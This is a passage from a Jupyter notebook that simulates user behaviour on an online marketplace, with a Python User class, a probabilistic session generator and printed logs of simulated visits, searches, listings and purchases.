'searches'):\n satisfaction += self.searches * self.satisfaction_impact['search'] \n \n if hasattr(self, 'n_deleted_items'):\n satisfaction += self.n_deleted_items * self.satisfaction_impact['delete_item'] \n \n if hasattr(self, 'active_items'):\n for item_id in self.active_items:\n satisfaction += (current_date - items[item_id].listing_date).days * self.satisfaction_impact['days_listed'] \n \n return satisfaction\n \n \n\n @property\n def listing_index(self):\n if self.n_sold_items > 0:\n index = self.n_sold_items / self.n_listed_items / 0.5\n elif self.n_listed_items:\n index = 1 - self.n_listed_items * 0.1 if self.n_listed_items <= 10 else 0\n else:\n index = 1\n \n return index\n\n \n \n @property\n def items_in_basket(self):\n \"\"\"Calculate items in basket\n \"\"\"\n return len(self.basket) if hasattr(self, 'basket') else 0\n \n \n \n @property\n def unread_messages(self):\n \"\"\"Get list of unread messages\n \"\"\"\n received_messages = self.messages_received if hasattr(self, 'messages_received') else []\n read_messages = self.read_messages if hasattr(self, 'read_messages') else []\n unread_messages = list(set(received_messages) - set(read_messages))\n \n return unread_messages\n \n \n \n @property\n def n_listed_items(self):\n \"\"\"Calculate number of listed items\n \"\"\"\n return len(self.listed_items) if hasattr(self, 'listed_items') else 0 \n \n \n \n @property\n def n_active_items(self):\n \"\"\"Calculate number of 
active items\n \"\"\"\n return len(self.active_items) if hasattr(self, 'active_items') else 0 \n\n \n \n @property\n def n_deleted_items(self):\n \"\"\"Calculate number of deleted items\n \"\"\"\n return len(self.deleted_items) if hasattr(self, 'deleted_items') else 0 \n \n \n \n @property\n def n_items_in_basket(self):\n \"\"\"Calculate number of deleted items\n \"\"\"\n return len(self.basket) if hasattr(self, 'basket') else 0 \n \n \n\n @property\n def n_sold_items(self):\n \"\"\"Calculate number of sold items\n \"\"\"\n return len(self.sold_items) if hasattr(self, 'sold_items') else 0 \n \n \n\n @property\n def n_purchases(self):\n \"\"\"Calculate number of purchased items\n \"\"\"\n return len(self.purchased_items) if hasattr(self, 'purchased_items') else 0 \n\n\n \n @property\n def n_messages_sent(self):\n \"\"\"Calculate number of sent messages\n \"\"\"\n return len(self.messages_sent) if hasattr(self, 'messages_sent') else 0 \n\n\n \n @property\n def n_messages_received(self):\n \"\"\"Calculate number of received messages\n \"\"\"\n return len(self.messages_received) if hasattr(self, 'messages_received') else 0 \n\n\n \n @property\n def n_unread_messages(self):\n \"\"\"Calculate number of received messages\n \"\"\"\n return len(self.unread_messages) if hasattr(self, 'unread_messages') else 0 \n\n \n \n @property\n def n_read_messages(self):\n \"\"\"Calculate number of read messages\n \"\"\"\n return len(self.messages_read) if hasattr(self, 'messages_read') else 0 \n \n\n \n def visit(self, platform, country, timestamp):\n \"\"\"User visit event. \n It's the first touch with the app within a session.\n Event creates / updates user attributes:\n visits: number of visits.\n last_visit: time of the last visit.\n last_activity: time of the last activity.\n last_properties: properties like platform and country.\n \n Parameters:\n timestamp: time of the event.\n platform: platform of the visit: 'ios', 'android', 'web'.\n country: country code of the visit: 'US', 'DE', 'GB' etc.\n \"\"\"\n self.active_session = True\n self.last_event = 'visit'\n self.last_activity = timestamp\n self.visits = self.visits + 1 if hasattr(self, 'visits') else 1\n self.last_visit = timestamp\n \n self.last_properties = {\n 'platform': platform,\n 'country': country\n }\n \n print(self.last_event, timestamp)\n \n\n \n def create_account(self, timestamp):\n \"\"\"User creates an account. \n Parameters:\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'create_account'\n self.last_activity = timestamp\n self.registered = True\n self.registration_date = timestamp\n \n print(self.last_event, timestamp)\n \n \n \n def send_message(self, timestamp):\n \"\"\"User sends message to another user. 
\n Parameters:\n recepient_id: id of the user who receives the message.\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'send_message'\n self.last_activity = timestamp\n \n # create message id\n recepient_id = items[self.open_item].lister_id\n message_id = hash(str(self.user_id) + str(recepient_id) + str(timestamp))\n \n # add messages to user attributes\n if hasattr(self, 'messages_sent'):\n self.messages_sent.append(message_id)\n else:\n self.messages_sent = [message_id]\n \n # store data to messages dict\n messages[message_id] = Message(sender_id=self.user_id, \n recepient_id=recepient_id, \n message_id=message_id, \n timestamp=timestamp) \n \n # update recepient attributes\n if hasattr(users[recepient_id], 'messages_received'):\n users[recepient_id].messages_received.append(message_id)\n else: \n users[recepient_id].messages_received = [message_id] \n \n print(self.last_event, timestamp)\n \n \n \n def read_message(self, timestamp):\n \"\"\"User reads message from another user. \n Parameters:\n message_id: id of the message.\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'read_message'\n self.last_activity = timestamp\n \n rand = np.random.default_rng(seed=abs(hash(timestamp)))\n message_id = rand.choice(a=self.unread_messages)\n self.unread_messages.remove(message_id)\n \n # store message to user's read messages\n if hasattr(self, 'read_messages'):\n self.read_messages.append(message_id)\n else:\n self.read_messages = [message_id]\n \n print(self.last_event, timestamp)\n\n \n\n def answer(self, timestamp):\n \"\"\"User reads message from another user. \n Parameters:\n message_id: id of the message.\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'answer'\n self.last_activity = timestamp\n \n # get sender_id who will be recepient of the next message\n message_id = self.read_messages[-1]\n recepient_id = messages[message_id].sender_id\n \n # create new message_id\n new_message_id = hash(str(self.user_id) + str(recepient_id) + str(timestamp))\n\n # add messages to user attributes\n if hasattr(self, 'messages_sent'):\n self.messages_sent.append(new_message_id)\n else:\n self.messages_sent = [new_message_id]\n \n # store data to messages dict\n messages[message_id] = Message(sender_id=self.user_id, \n recepient_id=recepient_id, \n message_id=new_message_id, \n timestamp=timestamp) \n \n # update recepient attributes\n if hasattr(users[recepient_id], 'messages_received'):\n users[recepient_id].messages_received.append(message_id)\n else: \n users[recepient_id].messages_received = [message_id]\n \n print(self.last_event, timestamp)\n \n\n\n def list_item(self, timestamp):\n \"\"\"User lists an item. \n Parameters:\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'list_item'\n self.last_activity = timestamp\n \n item_id = hash(str(self.user_id) + str(timestamp))\n \n if hasattr(self, 'listed_items'):\n self.listed_items.append(item_id)\n else:\n self.listed_items = [item_id]\n\n if hasattr(self, 'active_items'):\n self.active_items.append(item_id)\n else:\n self.active_items = [item_id]\n\n items[item_id] = Item(item_id=item_id, \n lister_id=self.user_id, \n listing_date=timestamp)\n \n print(self.last_event, timestamp)\n \n \n \n def search(self, timestamp):\n \"\"\"User performs a search. 
\n Parameters:\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'search'\n self.searches = self.searches + 1 if hasattr(self, 'searches') else 1\n self.last_activity = timestamp\n \n rand = np.random.default_rng(seed=abs(hash(timestamp)))\n self.available_items = rand.choice(a=list(items.keys()), size=20 if len(items.keys())>=20 else len(items.keys()), replace=False)\n\n print(self.last_event, timestamp)\n \n \n \n def view_item(self, timestamp):\n \"\"\"User views an item. \n Parameters:\n timestamp: time of the event.\n \"\"\" \n self.last_event = 'view_item'\n self.last_activity = timestamp\n self.item_views = self.item_views + 1 if hasattr(self, 'item_views') else 1\n \n rand = np.random.default_rng(seed=abs(hash(timestamp)))\n item_id = rand.choice(a=self.available_items)\n self.open_item = item_id\n items[item_id].views = items[item_id].views + 1 if hasattr(items[item_id], 'views') else 1\n \n print(self.last_event, timestamp)\n \n \n \n def add_to_basket(self, timestamp):\n \"\"\"User adds an item to the basket. \n Parameters:\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'add_to_basket'\n self.last_activity = timestamp\n \n if hasattr(self, 'basket'):\n self.basket.append(self.open_item)\n else:\n self.basket = [self.open_item]\n \n print(self.last_event, timestamp)\n\n \n \n def open_basket(self, timestamp):\n \"\"\"User adds an item to the basket. \n Parameters:\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'open_basket'\n self.last_activity = timestamp\n \n print(self.last_event, timestamp)\n \n \n \n def remove_from_basket(self, timestamp):\n \"\"\"User removes an item to the basket. \n Parameters:\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'remove_from_basket'\n self.last_activity = timestamp\n \n rand = np.random.default_rng(seed=abs(hash(timestamp)))\n item_id = rand.choice(a=self.basket)\n self.basket.remove(item_id)\n \n print(self.last_event, timestamp)\n \n \n \n def pay(self, timestamp):\n \"\"\"User pays for item / set of items. \n Parameters:\n item_id: id of the item user views.\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'pay'\n self.last_activity = timestamp\n \n for item_id in self.basket: \n # updateitems attributes\n items[item_id].status = 'sold'\n items[item_id].buyer = self.user_id\n items[item_id].date_sold = timestamp\n \n # update lister's attributes\n lister_id = items[item_id].lister_id\n users[lister_id].active_items.remove(item_id)\n \n if hasattr(users[lister_id], 'sold_items'):\n users[lister_id].sold_items.append(item_id)\n else:\n users[lister_id].sold_items = [item_id]\n \n # update buyer's attributes\n if hasattr(self, 'purchased_items'):\n self.purchased_items.extend(self.basket)\n else:\n self.purchased_items = self.basket\n \n # empy basket\n self.basket = []\n \n print(self.last_event, timestamp)\n\n\n\n def delete_items(self, item_id, timestamp):\n \"\"\"User removes an item. 
\n Parameters:\n item_id: id of the item user views.\n timestamp: time of the event.\n \"\"\"\n self.last_event = 'delete_items'\n self.last_activity = timestamp\n self.active_items.remove(item_id)\n items[item_id].status = 'deleted'\n items[item_id].date_deleted = timestamp\n \n if hasattr(self, 'deleted_items'):\n self.deleted_items.append(item_id)\n else:\n self.deleted_items = [item_id]\n\n \n \n def do_nothing(self, timestamp):\n self.active_session = False", "_____no_output_____" ], [ "def session(user_id, timestamp):\n if user_id not in users.keys():\n users[user_id] = User(name=str(user_id), user_id='user_id')\n \n users[user_id].visit(timestamp=timestamp, platform='ios', country='DE')\n \n # number of the event\n n = 0\n \n while users[user_id].active_session:\n last_event = users[user_id].last_event\n \n next_events = events[last_event]['next_events'].copy()\n probabilities = events[last_event]['probabilities'].copy()\n \n \n # adjust registration probability\n if users[user_id].registered == False and 'create_account' not in next_events:\n # add registration as potential event\n next_events.append('create_account')\n probabilities = [prob * 0.8 for prob in probabilities]\n probabilities.append(0.2)\n\n \n # adjust open basket probability\n if users[user_id].n_items_in_basket > 0 and users[user_id].last_event != 'open_basket' and 'open_basket' not in next_events:\n next_events.append('open_basket')\n probabilities = [prob * 0.8 for prob in probabilities]\n probabilities.append(0.2)\n \n\n # adjust read_message probability\n if users[user_id].n_unread_messages > 0:\n # add read_message as potential event\n next_events.append('read_message')\n probabilities = [prob * 0.2 for prob in probabilities]\n probabilities.append(0.8)\n \n \n # adjust listing probability\n if 'list_item' in next_events:\n index = next_events.index('list_item')\n probabilities[index] = probabilities[index] * users[user_id].listing_index \n \n \n # with every event probability of do nothing grows\n if 'do_nothing' in next_events:\n index = next_events.index('do_nothing')\n probabilities[index] = probabilities[index] * (1 + n/100)\n \n \n # check condition for every event\n for event in next_events:\n if 'conditions' in events[event]:\n for condition in events[event]['conditions']:\n if eval(f'users[user_id].{condition}') == False:\n index = next_events.index(event)\n next_events.remove(event)\n probabilities.pop(index) \n break\n \n \n # normalize probabilities\n total_p = sum(probabilities)\n probabilities = [p/total_p for p in probabilities]\n probabilities[0] = probabilities[0] + 1-sum(probabilities) \n \n rand = np.random.default_rng(seed=timestamp.minute*60+timestamp.second+user_id)\n next_event = rand.choice(a=next_events, p=probabilities)\n \n \n time_delta = int(rand.integers(low=events[last_event]['time'][0], high=events[last_event]['time'][1]))\n timestamp = timestamp + timedelta(seconds=time_delta)\n \n eval(f'users[user_id].{next_event}(timestamp=timestamp)')\n n += 1", "_____no_output_____" ], [ "# create initial set of items\nusers[1] = User(name='first user', user_id=1)\n\nstart_date = datetime.now() - timedelta(days=10)\nusers[1].create_account(timestamp=start_date)\n\nfor i in range(100):\n users[1].list_item(timestamp=start_date + timedelta(seconds=i+1) + timedelta(minutes=i+1))", "create_account 2021-04-08 23:11:37.686658\nlist_item 2021-04-08 23:12:38.686658\nlist_item 2021-04-08 23:13:39.686658\nlist_item 2021-04-08 23:14:40.686658\nlist_item 2021-04-08 23:15:41.686658\nlist_item 
2021-04-08 23:16:42.686658\nlist_item 2021-04-08 23:17:43.686658\nlist_item 2021-04-08 23:18:44.686658\nlist_item 2021-04-08 23:19:45.686658\nlist_item 2021-04-08 23:20:46.686658\nlist_item 2021-04-08 23:21:47.686658\nlist_item 2021-04-08 23:22:48.686658\nlist_item 2021-04-08 23:23:49.686658\nlist_item 2021-04-08 23:24:50.686658\nlist_item 2021-04-08 23:25:51.686658\nlist_item 2021-04-08 23:26:52.686658\nlist_item 2021-04-08 23:27:53.686658\nlist_item 2021-04-08 23:28:54.686658\nlist_item 2021-04-08 23:29:55.686658\nlist_item 2021-04-08 23:30:56.686658\nlist_item 2021-04-08 23:31:57.686658\nlist_item 2021-04-08 23:32:58.686658\nlist_item 2021-04-08 23:33:59.686658\nlist_item 2021-04-08 23:35:00.686658\nlist_item 2021-04-08 23:36:01.686658\nlist_item 2021-04-08 23:37:02.686658\nlist_item 2021-04-08 23:38:03.686658\nlist_item 2021-04-08 23:39:04.686658\nlist_item 2021-04-08 23:40:05.686658\nlist_item 2021-04-08 23:41:06.686658\nlist_item 2021-04-08 23:42:07.686658\nlist_item 2021-04-08 23:43:08.686658\nlist_item 2021-04-08 23:44:09.686658\nlist_item 2021-04-08 23:45:10.686658\nlist_item 2021-04-08 23:46:11.686658\nlist_item 2021-04-08 23:47:12.686658\nlist_item 2021-04-08 23:48:13.686658\nlist_item 2021-04-08 23:49:14.686658\nlist_item 2021-04-08 23:50:15.686658\nlist_item 2021-04-08 23:51:16.686658\nlist_item 2021-04-08 23:52:17.686658\nlist_item 2021-04-08 23:53:18.686658\nlist_item 2021-04-08 23:54:19.686658\nlist_item 2021-04-08 23:55:20.686658\nlist_item 2021-04-08 23:56:21.686658\nlist_item 2021-04-08 23:57:22.686658\nlist_item 2021-04-08 23:58:23.686658\nlist_item 2021-04-08 23:59:24.686658\nlist_item 2021-04-09 00:00:25.686658\nlist_item 2021-04-09 00:01:26.686658\nlist_item 2021-04-09 00:02:27.686658\nlist_item 2021-04-09 00:03:28.686658\nlist_item 2021-04-09 00:04:29.686658\nlist_item 2021-04-09 00:05:30.686658\nlist_item 2021-04-09 00:06:31.686658\nlist_item 2021-04-09 00:07:32.686658\nlist_item 2021-04-09 00:08:33.686658\nlist_item 2021-04-09 00:09:34.686658\nlist_item 2021-04-09 00:10:35.686658\nlist_item 2021-04-09 00:11:36.686658\nlist_item 2021-04-09 00:12:37.686658\nlist_item 2021-04-09 00:13:38.686658\nlist_item 2021-04-09 00:14:39.686658\nlist_item 2021-04-09 00:15:40.686658\nlist_item 2021-04-09 00:16:41.686658\nlist_item 2021-04-09 00:17:42.686658\nlist_item 2021-04-09 00:18:43.686658\nlist_item 2021-04-09 00:19:44.686658\nlist_item 2021-04-09 00:20:45.686658\nlist_item 2021-04-09 00:21:46.686658\nlist_item 2021-04-09 00:22:47.686658\nlist_item 2021-04-09 00:23:48.686658\nlist_item 2021-04-09 00:24:49.686658\nlist_item 2021-04-09 00:25:50.686658\nlist_item 2021-04-09 00:26:51.686658\nlist_item 2021-04-09 00:27:52.686658\nlist_item 2021-04-09 00:28:53.686658\nlist_item 2021-04-09 00:29:54.686658\nlist_item 2021-04-09 00:30:55.686658\nlist_item 2021-04-09 00:31:56.686658\nlist_item 2021-04-09 00:32:57.686658\nlist_item 2021-04-09 00:33:58.686658\nlist_item 2021-04-09 00:34:59.686658\nlist_item 2021-04-09 00:36:00.686658\nlist_item 2021-04-09 00:37:01.686658\nlist_item 2021-04-09 00:38:02.686658\nlist_item 2021-04-09 00:39:03.686658\nlist_item 2021-04-09 00:40:04.686658\nlist_item 2021-04-09 00:41:05.686658\nlist_item 2021-04-09 00:42:06.686658\nlist_item 2021-04-09 00:43:07.686658\nlist_item 2021-04-09 00:44:08.686658\nlist_item 2021-04-09 00:45:09.686658\nlist_item 2021-04-09 00:46:10.686658\nlist_item 2021-04-09 00:47:11.686658\nlist_item 2021-04-09 00:48:12.686658\nlist_item 2021-04-09 00:49:13.686658\nlist_item 2021-04-09 00:50:14.686658\nlist_item 2021-04-09 
00:51:15.686658\nlist_item 2021-04-09 00:52:16.686658\nlist_item 2021-04-09 00:53:17.686658\n" ], [ "# create events for the first users\nfor i in range(2,101):\n print('\\nUSER: {}'.format(i))\n users[i] = User(name='{} user'.format(i), user_id=i)\n session(user_id=i, timestamp=start_date + timedelta(minutes=300+i) + timedelta(seconds=i))", "\nUSER: 2\nvisit 2021-04-09 04:13:39.686658\ncreate_account 2021-04-09 04:13:42.686658\nsearch 2021-04-09 04:15:55.686658\nview_item 2021-04-09 04:17:19.686658\n\nUSER: 3\nvisit 2021-04-09 04:14:40.686658\n\nUSER: 4\nvisit 2021-04-09 04:15:41.686658\n\nUSER: 5\nvisit 2021-04-09 04:16:42.686658\nsearch 2021-04-09 04:16:56.686658\nview_item 2021-04-09 04:17:58.686658\nsearch 2021-04-09 04:18:12.686658\nview_item 2021-04-09 04:19:33.686658\nview_item 2021-04-09 04:19:52.686658\n\nUSER: 6\nvisit 2021-04-09 04:17:43.686658\ncreate_account 2021-04-09 04:17:51.686658\n\nUSER: 7\nvisit 2021-04-09 04:18:44.686658\n\nUSER: 8\nvisit 2021-04-09 04:19:45.686658\nsearch 2021-04-09 04:19:50.686658\nview_item 2021-04-09 04:20:07.686658\nview_item 2021-04-09 04:20:19.686658\nsearch 2021-04-09 04:20:42.686658\nview_item 2021-04-09 04:22:38.686658\ncreate_account 2021-04-09 04:23:04.686658\nsearch 2021-04-09 04:23:49.686658\nsearch 2021-04-09 04:25:38.686658\nsearch 2021-04-09 04:26:51.686658\n\nUSER: 9\nvisit 2021-04-09 04:20:46.686658\nsearch 2021-04-09 04:20:58.686658\nsearch 2021-04-09 04:21:51.686658\nsearch 2021-04-09 04:23:40.686658\n\nUSER: 10\nvisit 2021-04-09 04:21:47.686658\n\nUSER: 11\nvisit 2021-04-09 04:22:48.686658\n\nUSER: 12\nvisit 2021-04-09 04:23:49.686658\n\nUSER: 13\nvisit 2021-04-09 04:24:50.686658\ncreate_account 2021-04-09 04:24:59.686658\nlist_item 2021-04-09 04:26:03.686658\n\nUSER: 14\nvisit 2021-04-09 04:25:51.686658\nsearch 2021-04-09 04:26:06.686658\nview_item 2021-04-09 04:27:29.686658\n\nUSER: 15\nvisit 2021-04-09 04:26:52.686658\n\nUSER: 16\nvisit 2021-04-09 04:27:53.686658\ncreate_account 2021-04-09 04:28:06.686658\nsearch 2021-04-09 04:28:58.686658\nview_item 2021-04-09 04:30:13.686658\nsearch 2021-04-09 04:30:30.686658\nview_item 2021-04-09 04:32:06.686658\nview_item 2021-04-09 04:32:22.686658\nview_item 2021-04-09 04:32:50.686658\nview_item 2021-04-09 04:33:05.686658\nsend_message 2021-04-09 04:33:19.686658\nsearch 2021-04-09 04:33:38.686658\nsearch 2021-04-09 04:34:23.686658\nview_item 2021-04-09 04:35:34.686658\n\nUSER: 17\nvisit 2021-04-09 04:28:54.686658\n\nUSER: 18\nvisit 2021-04-09 04:29:55.686658\nsearch 2021-04-09 04:30:01.686658\nsearch 2021-04-09 04:31:59.686658\nsearch 2021-04-09 04:32:21.686658\nview_item 2021-04-09 04:33:09.686658\n\nUSER: 19\nvisit 2021-04-09 04:30:56.686658\nsearch 2021-04-09 04:31:07.686658\nsearch 2021-04-09 04:32:23.686658\nsearch 2021-04-09 04:33:07.686658\ncreate_account 2021-04-09 04:34:26.686658\nsearch 2021-04-09 04:35:11.686658\n\nUSER: 20\nvisit 2021-04-09 04:31:57.686658\nsearch 2021-04-09 04:31:59.686658\ncreate_account 2021-04-09 04:32:12.686658\nlist_item 2021-04-09 04:33:57.686658\n\nUSER: 21\nvisit 2021-04-09 04:32:58.686658\n\nUSER: 22\nvisit 2021-04-09 04:33:59.686658\nsearch 2021-04-09 04:34:08.686658\nsearch 2021-04-09 04:34:25.686658\nview_item 2021-04-09 04:36:01.686658\nview_item 2021-04-09 04:36:28.686658\ncreate_account 2021-04-09 04:36:41.686658\nsearch 2021-04-09 04:38:26.686658\n\nUSER: 23\nvisit 2021-04-09 04:35:00.686658\nsearch 2021-04-09 04:35:05.686658\n\nUSER: 24\nvisit 2021-04-09 04:36:01.686658\n\nUSER: 25\nvisit 2021-04-09 04:37:02.686658\nsearch 2021-04-09 
04:37:04.686658\nview_item 2021-04-09 04:38:10.686658\nview_item 2021-04-09 04:38:37.686658\ncreate_account 2021-04-09 04:38:55.686658\nsearch 2021-04-09 04:40:00.686658\n\nUSER: 26\nvisit 2021-04-09 04:38:03.686658\n\nUSER: 27\nvisit 2021-04-09 04:39:04.686658\nsearch 2021-04-09 04:39:16.686658\nview_item 2021-04-09 04:40:15.686658\ncreate_account 2021-04-09 04:40:38.686658\nsearch 2021-04-09 04:43:03.686658\nview_item 2021-04-09 04:44:23.686658\nadd_to_basket 2021-04-09 04:44:46.686658\nsearch 2021-04-09 04:45:04.686658\nview_item 2021-04-09 04:46:47.686658\nsend_message 2021-04-09 04:47:10.686658\nview_item 2021-04-09 04:47:34.686658\nopen_basket 2021-04-09 04:48:03.686658\n\nUSER: 28\nvisit 2021-04-09 04:40:05.686658\ncreate_account 2021-04-09 04:40:15.686658\nlist_item 2021-04-09 04:41:24.686658\n\nUSER: 29\nvisit 2021-04-09 04:41:06.686658\n\nUSER: 30\nvisit 2021-04-09 04:42:07.686658\ncreate_account 2021-04-09 04:42:09.686658\nsearch 2021-04-09 04:44:22.686658\n\nUSER: 31\nvisit 2021-04-09 04:43:08.686658\nsearch 2021-04-09 04:43:21.686658\nview_item 2021-04-09 04:44:18.686658\ncreate_account 2021-04-09 04:44:42.686658\nsearch 2021-04-09 04:45:26.686658\nsearch 2021-04-09 04:46:39.686658\nsearch 2021-04-09 04:47:01.686658\nview_item 2021-04-09 04:48:35.686658\nview_item 2021-04-09 04:48:53.686658\n\nUSER: 32\nvisit 2021-04-09 04:44:09.686658\ncreate_account 2021-04-09 04:44:22.686658\nsearch 2021-04-09 04:46:04.686658\nsearch 2021-04-09 04:47:29.686658\n\nUSER: 33\nvisit 2021-04-09 04:45:10.686658\nsearch 2021-04-09 04:45:20.686658\nview_item 2021-04-09 04:46:16.686658\ncreate_account 2021-04-09 04:46:29.686658\n\nUSER: 34\nvisit 2021-04-09 04:46:11.686658\nsearch 2021-04-09 04:46:17.686658\nview_item 2021-04-09 04:46:57.686658\n\nUSER: 35\nvisit 2021-04-09 04:47:12.686658\nsearch 2021-04-09 04:47:27.686658\nsearch 2021-04-09 04:48:41.686658\nview_item 2021-04-09 04:50:30.686658\nview_item 2021-04-09 04:50:53.686658\ncreate_account 2021-04-09 04:51:16.686658\nsearch 2021-04-09 04:53:19.686658\nview_item 2021-04-09 04:54:41.686658\n\nUSER: 36\nvisit 2021-04-09 04:48:13.686658\nsearch 2021-04-09 04:48:28.686658\nview_item 2021-04-09 04:49:05.686658\ncreate_account 2021-04-09 04:49:20.686658\n\nUSER: 37\nvisit 2021-04-09 04:49:14.686658\ncreate_account 2021-04-09 04:49:31.686658\nlist_item 2021-04-09 04:50:05.686658\nsearch 2021-04-09 04:54:29.686658\nsearch 2021-04-09 04:55:22.686658\nsearch 2021-04-09 04:57:19.686658\nsearch 2021-04-09 04:58:53.686658\nsearch 2021-04-09 04:59:40.686658\nview_item 2021-04-09 05:00:57.686658\nview_item 2021-04-09 05:01:26.686658\nsearch 2021-04-09 05:01:47.686658\nview_item 2021-04-09 05:02:31.686658\nview_item 2021-04-09 05:02:59.686658\n\nUSER: 38\nvisit 2021-04-09 04:50:15.686658\n\nUSER: 39\nvisit 2021-04-09 04:51:16.686658\nsearch 2021-04-09 04:51:25.686658\n\nUSER: 40\nvisit 2021-04-09 04:52:17.686658\n\nUSER: 41\nvisit 2021-04-09 04:53:18.686658\ncreate_account 2021-04-09 04:53:23.686658\nsearch 2021-04-09 04:54:22.686658\nview_item 2021-04-09 04:55:06.686658\nview_item 2021-04-09 04:55:19.686658\nsearch 2021-04-09 04:55:31.686658\nsearch 2021-04-09 04:55:51.686658\nview_item 2021-04-09 04:56:06.686658\nview_item 2021-04-09 04:56:32.686658\nadd_to_basket 2021-04-09 04:56:47.686658\n\nUSER: 42\nvisit 2021-04-09 04:54:19.686658\nsearch 2021-04-09 04:54:20.686658\nview_item 2021-04-09 04:56:09.686658\nview_item 2021-04-09 04:56:24.686658\ncreate_account 2021-04-09 04:56:50.686658\nsearch 2021-04-09 04:59:05.686658\n\nUSER: 43\nvisit 2021-04-09 
04:55:20.686658\nsearch 2021-04-09 04:55:24.686658\nsearch 2021-04-09 04:57:16.686658\n\nUSER: 44\nvisit 2021-04-09 04:56:21.686658\n\nUSER: 45\nvisit 2021-04-09 04:57:22.686658\nsearch 2021-04-09 04:57:26.686658\ncreate_account 2021-04-09 04:58:02.686658\nsearch 2021-04-09 04:58:59.686658\nview_item 2021-04-09 05:00:21.686658\n\nUSER: 46\nvisit 2021-04-09 04:58:23.686658\ncreate_account 2021-04-09 04:58:27.686658\n\nUSER: 47\nvisit 2021-04-09 04:59:24.686658\ncreate_account 2021-04-09 04:59:29.686658\nsearch 2021-04-09 05:00:22.686658\nview_item 2021-04-09 05:01:46.686658\n\nUSER: 48\nvisit 2021-04-09 05:00:25.686658\nsearch 2021-04-09 05:00:40.686658\nsearch 2021-04-09 05:02:33.686658\ncreate_account 2021-04-09 05:02:57.686658\nsearch 2021-04-09 05:04:34.686658\nsearch 2021-04-09 05:05:16.686658\nsearch 2021-04-09 05:05:38.686658\nsearch 2021-04-09 05:07:32.686658\nview_item 2021-04-09 05:08:27.686658\nview_item 2021-04-09 05:08:55.686658\nview_item 2021-04-09 05:09:21.686658\nadd_to_basket 2021-04-09 05:09:45.686658\nsearch 2021-04-09 05:10:34.686658\nview_item 2021-04-09 05:12:32.686658\nsend_message 2021-04-09 05:12:53.686658\nopen_basket 2021-04-09 05:13:06.686658\npay 2021-04-09 05:14:37.686658\n\nUSER: 49\nvisit 2021-04-09 05:01:26.686658\n\nUSER: 50\nvisit 2021-04-09 05:02:27.686658\ncreate_account 2021-04-09 05:02:43.686658\nsearch 2021-04-09 05:04:04.686658\nview_item 2021-04-09 05:04:21.686658\nview_item 2021-04-09 05:04:35.686658\nsend_message 2021-04-09 05:04:56.686658\nview_item 2021-04-09 05:05:19.686658\nlist_item 2021-04-09 05:05:48.686658\n\nUSER: 51\nvisit 2021-04-09 05:03:28.686658\n\nUSER: 52\nvisit 2021-04-09 05:04:29.686658\n\nUSER: 53\nvisit 2021-04-09 05:05:30.686658\nsearch 2021-04-09 05:05:46.686658\nview_item 2021-04-09 05:06:01.686658\nsearch 2021-04-09 05:06:18.686658\nsearch 2021-04-09 05:07:44.686658\n\nUSER: 54\nvisit 2021-04-09 05:06:31.686658\n\nUSER: 55\nvisit 2021-04-09 05:07:32.686658\nsearch 2021-04-09 05:07:32.686658\nsearch 2021-04-09 05:07:46.686658\n\nUSER: 56\nvisit 2021-04-09 05:08:33.686658\ncreate_account 2021-04-09 05:08:52.686658\n\nUSER: 57\nvisit 2021-04-09 05:09:34.686658\ncreate_account 2021-04-09 05:09:44.686658\nsearch 2021-04-09 05:11:12.686658\nview_item 2021-04-09 05:13:02.686658\nsend_message 2021-04-09 05:13:28.686658\n\nUSER: 58\nvisit 2021-04-09 05:10:35.686658\ncreate_account 2021-04-09 05:10:41.686658\nsearch 2021-04-09 05:13:02.686658\n\nUSER: 59\nvisit 2021-04-09 05:11:36.686658\n\nUSER: 60\nvisit 2021-04-09 05:12:37.686658\nsearch 2021-04-09 05:12:48.686658\nsearch 2021-04-09 05:13:36.686658\nview_item 2021-04-09 05:15:32.686658\n\nUSER: 61\nvisit 2021-04-09 05:13:38.686658\n\nUSER: 62\nvisit 2021-04-09 05:14:39.686658\nsearch 2021-04-09 05:14:45.686658\nview_item 2021-04-09 05:16:29.686658\ncreate_account 2021-04-09 05:16:39.686658\nsearch 2021-04-09 05:17:23.686658\nview_item 2021-04-09 05:19:15.686658\nsearch 2021-04-09 05:19:29.686658\n\nUSER: 63\nvisit 2021-04-09 05:15:40.686658\nsearch 2021-04-09 05:15:51.686658\nview_item 2021-04-09 05:16:51.686658\ncreate_account 2021-04-09 05:17:06.686658\nsearch 2021-04-09 05:19:21.686658\nsearch 2021-04-09 05:19:36.686658\nview_item 2021-04-09 05:20:41.686658\nview_item 2021-04-09 05:21:05.686658\nsend_message 2021-04-09 05:21:31.686658\nview_item 2021-04-09 05:21:43.686658\n\nUSER: 64\nvisit 2021-04-09 05:16:41.686658\ncreate_account 2021-04-09 05:16:49.686658\nsearch 2021-04-09 05:19:12.686658\nsearch 2021-04-09 05:20:19.686658\nview_item 2021-04-09 
05:21:04.686658\nsend_message 2021-04-09 05:21:30.686658\nview_item 2021-04-09 05:21:42.686658\n\nUSER: 65\nvisit 2021-04-09 05:17:42.686658\ncreate_account 2021-04-09 05:17:45.686658\nsearch 2021-04-09 05:19:33.686658\n\nUSER: 66\nvisit 2021-04-09 05:18:43.686658\ncreate_account 2021-04-09 05:18:46.686658\nlist_item 2021-04-09 05:20:21.686658\n\nUSER: 67\nvisit 2021-04-09 05:19:44.686658\nsearch 2021-04-09 05:20:03.686658\ncreate_account 2021-04-09 05:20:20.686658\nsearch 2021-04-09 05:22:20.686658\nview_item 2021-04-09 05:24:16.686658\nsearch 2021-04-09 05:24:28.686658\nview_item 2021-04-09 05:26:24.686658\nview_item 2021-04-09 05:26:50.686658\nadd_to_basket 2021-04-09 05:27:00.686658\nopen_basket 2021-04-09 05:27:14.686658\npay 2021-04-09 05:27:30.686658\n\nUSER: 68\nvisit 2021-04-09 05:20:45.686658\nsearch 2021-04-09 05:20:49.686658\nview_item 2021-04-09 05:22:05.686658\ncreate_account 2021-04-09 05:22:19.686658\nsearch 2021-04-09 05:24:44.686658\nview_item 2021-04-09 05:25:52.686658\nview_item 2021-04-09 